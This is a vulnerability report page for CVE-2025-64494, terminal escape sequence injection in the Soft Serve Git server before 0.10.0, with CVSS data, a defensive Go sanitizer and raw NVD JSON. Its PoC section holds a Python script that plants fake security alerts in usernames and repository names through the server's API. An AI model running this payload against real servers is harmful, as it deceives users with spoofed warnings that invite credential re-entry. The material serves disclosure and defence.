Security Vulnerability Report
CVE-2025-64494 CVSS 4.6 MEDIUM

Published: 2025-11-08 02:15:35
Last Modified: 2026-04-15 00:35:42

Description

Soft Serve is a self-hostable Git server for the command line. In versions prior to 0.10.0, there are several places where the user can insert data (e.g. names) and ANSI escape sequences are not being removed, which can then be used, for example, to show fake alerts. In the same token, git messages, when printed, are also not being sanitized. This issue is fixed in version 0.10.0.
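The fix for this class of bug (CWE-150, unneutralized terminal escape sequences) is to strip escape sequences from user-controlled text before it is rendered in a terminal. The Go sanitizer below is an added example written for this report, not Soft Serve's own code; the sample string in main is constructed for illustration.

```go
package main

import (
	"fmt"
	"strings"
	"unicode"
)

// StripANSI drops terminal escape sequences (CSI, OSC, other ESC sequences) and
// stray C0/C1 control characters, except tab and newline, from user-supplied text
// such as names and commit messages before they are rendered in a terminal.
func StripANSI(s string) string {
	runes := []rune(s)
	var b strings.Builder
	for i := 0; i < len(runes); i++ {
		// Ordinary runes and a lone trailing ESC go through the control filter.
		if runes[i] != 0x1b || i+1 == len(runes) {
			if runes[i] == '\n' || runes[i] == '\t' || !unicode.IsControl(runes[i]) {
				b.WriteRune(runes[i])
			}
			continue
		}
		switch runes[i+1] {
		case '[': // CSI: skip parameter/intermediate bytes up to the final byte 0x40-0x7E
			i += 2
			for i < len(runes) && (runes[i] < 0x40 || runes[i] > 0x7e) {
				i++
			}
		case ']': // OSC: skip until BEL or the ESC \ string terminator
			i += 2
			for i < len(runes) && runes[i] != 0x07 {
				if runes[i] == 0x1b && i+1 < len(runes) && runes[i+1] == '\\' {
					i++
					break
				}
				i++
			}
		default: // other escapes: optional intermediates 0x20-0x2F, then one final byte
			i++
			for i < len(runes) && runes[i] >= 0x20 && runes[i] <= 0x2f {
				i++
			}
		}
	}
	return b.String()
}

func main() {
	// Constructed sample: a "fake alert" of the kind a display name could carry.
	fmt.Printf("%q\n", StripANSI("\x1b[2J\x1b[41;37;1mCRITICAL ALERT\x1b[0m\nre-login"))
}
```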

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

charmbracelet/soft-serve < 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# ANSI Escape Sequence Injection PoC for CVE-2025-64494
# Target: Soft Serve Git Server < 0.10.0
# Attack: Inject ANSI escape sequences via username to display fake alerts
import requests

TARGET_URL = "http://target-server:23231"
ATTACKER_TOKEN = "your-low-privilege-token"

# Malicious username with ANSI escape sequences
# \x1b[2J       - Clear screen
# \x1b[1;1H     - Move cursor to top-left
# \x1b[41;37;1m - Red background, white text, bold
# \x1b[0m       - Reset formatting
fake_alert = (
    "\x1b[2J\x1b[1;1H\x1b[41;37;1mCRITICAL SECURITY ALERT\x1b[0m\n"
    "\x1b[33mYour session has expired. Please re-authenticate.\x1b[0m"
)

payload = {
    "username": fake_alert,
    "email": "[email protected]",
}
headers = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}",
    "Content-Type": "application/json",
}

# Step 1: Update username with ANSI injection
response = requests.patch(
    f"{TARGET_URL}/api/v1/account",
    headers=headers,
    json=payload,
)

if response.status_code == 200:
    print("[+] ANSI escape sequence injected successfully")
    print("[*] When other users view this username, they will see:")
    print(fake_alert)
else:
    print(f"[-] Injection failed: {response.status_code}")
    print(response.text)

# Alternative: Inject via repository name
repo_payload = {
    "name": "\x1b[31m\x1b[5mFAKE WARNING\x1b[0m",
    "description": "\x1b[1mYour SSH key will be revoked in 24h\x1b[0m",
}
response = requests.post(
    f"{TARGET_URL}/api/v1/repos",
    headers=headers,
    json=repo_payload,
)
print(f"[*] Repository injection status: {response.status_code}")

References

https://github.com/charmbracelet/soft-serve/commit/d9639320b8d0ccd76fe6836a042c042b0ebde549
https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-fv2r-r8mp-pg48
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64494",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-08T02:15:35.060",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Soft Serve is a self-hostable Git server for the command line. In versions prior to 0.10.0, there are several places where the user can insert data (e.g. names) and ANSI escape sequences are not being removed, which can then be used, for example, to show fake alerts. In the same token, git messages, when printed, are also not being sanitized. This issue is fixed in version 0.10.0."
      },
      {
        "lang": "es",
        "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. En versiones anteriores a la 0.10.0, existen varios puntos donde el usuario puede insertar datos (por ejemplo, nombres) y las secuencias de escape ANSI no se están eliminando, lo que puede usarse, por ejemplo, para mostrar alertas falsas. Del mismo modo, los mensajes de Git, cuando se imprimen, tampoco se están saneando. Este problema se ha corregido en la versión 0.10.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 4.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-150"}]
      }
    ],
    "references": [
      {
        "url": "https://github.com/charmbracelet/soft-serve/commit/d9639320b8d0ccd76fe6836a042c042b0ebde549",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-fv2r-r8mp-pg48",
        "source": "[email protected]"
      }
    ]
  }
}